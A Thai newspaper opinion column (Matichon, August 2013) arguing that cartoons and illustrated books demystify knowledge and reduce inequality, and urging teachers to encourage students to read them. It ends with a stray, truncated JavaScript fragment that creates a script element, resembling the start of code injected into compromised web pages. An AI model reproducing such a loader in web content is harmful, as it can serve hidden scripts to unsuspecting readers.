มติชนรายวัน ฉบับประจำวันพุธที่ 14 สิงหาคม 2556

 

           การ์ตูน เป็นอีกโลกหนึ่งที่ทันสมัยและสนุกสนาน ด้วยอารมณ์ขันหัวหกก้นขวิด

           ประเทศที่ยิ่งก้าวหน้าทางเศรษฐกิจสังคม ยิ่งมีโลกการ์ตูนกว้างขวางไร้เขตจำกัดหลากหลายรูปแบบ เช่น ภาพยนตร์, หนังสือ (รวมถึงประเภทประดับภาพ)

           ทั้งนี้เพราะเทคโนโลยีเปลี่ยนแปลง ภาษาก็เปลี่ยนไป เช่น ต้องกระชับ กะทัดรัด สั้นที่สุด ตามความจำกัดของเทคโนโลยีทางการสื่อสาร

           วิชาความรู้ยุคแรกเริ่มในสังคมดึกดำบรรพ์ ถือเป็นของศักดิ์สิทธิ์ โดยผ่านภาษาชั้นสูง และเป็นสมบัติของผู้มีฤทธิ์ มีอำนาจ เช่น หมอผี, คนชั้นสูง, นักบวช

           ยุคต่อมาถ่ายเทสู่ผู้สืบทอดความศักดิ์สิทธิ์ เช่น ครู, อาจารย์, นักวิชาการ, คนชั้นนำ

           ส่วนสามัญชนคนชั้นล่างๆ เข้าถึงวิชาความรู้ยากมากๆ หรือเข้าไม่ถึง เพราะภาษาชั้นสูงเป็นอุปสรรค

           การ์ตูน เป็นอุปกรณ์ลดความศักดิ์สิทธิ์ของวิชาความรู้ ให้เป็นเรื่องสามัญปกติธรรมดา แล้วเข้าถึงง่าย สะดวก เท่ากับลดความเหลื่อมล้ำทางสังคมวัฒนธรรม

           ถือเป็นบันไดขั้นต้นให้คนสามัญก้าวขึ้นบันไดขั้นต่อไป ซึ่งมีวรรณศิลป์สูงขึ้น

           สำนักพิมพ์ของประเทศก้าวหน้าในโลกปัจจุบัน ดัดแปลงตำรับตำราวิชาความรู้เป็นหนังสือประเภทการ์ตูน และประดับภาพในรูปแบบต่างๆหลากหลายอย่างคับคั่งไม่ขาดแคลน เพื่อสร้างสังคมให้มีพลังสร้างสรรค์

           ในไทยก็มีการผลิตหนังสือประเภทเหล่านี้ออกมาอย่างต่อเนื่องนานแล้ว จนล่าสุดที่จัดในกลุ่มการ์ตูน และประดับภาพความรู้ เช่น กรุงเทพฯ น่ารู้ มี 4 เล่ม ชุด M Young ของสำนักพิมพ์มติชน

           ครูภาษาไทยและครูสังคมต้องปรับทัศนคติ ให้ลดจากสำนึกศักดิ์สิทธิ์แบบโบราณดึกดำบรรพ์ลงมากๆ หรือหมดไปเลย

           แล้วแนะนำสนับสนุนให้นักเรียนดูสื่ออ่านการ์ตูนและประดับภาพทุกประเภท(รวมเรื่องทางเพศ)อย่างรู้เท่าทันโลกและชีวิต

           จะช่วยลดปัญหาเด็กนักเรียนอ่านไม่ออก เขียนไม่ได้ พร้อมทั้งกระตุ้นให้เกิดพลังสร้างเสริมเศรษฐกิจสร้างสรรค์

var d=document;var s=d.createElement(‘script’);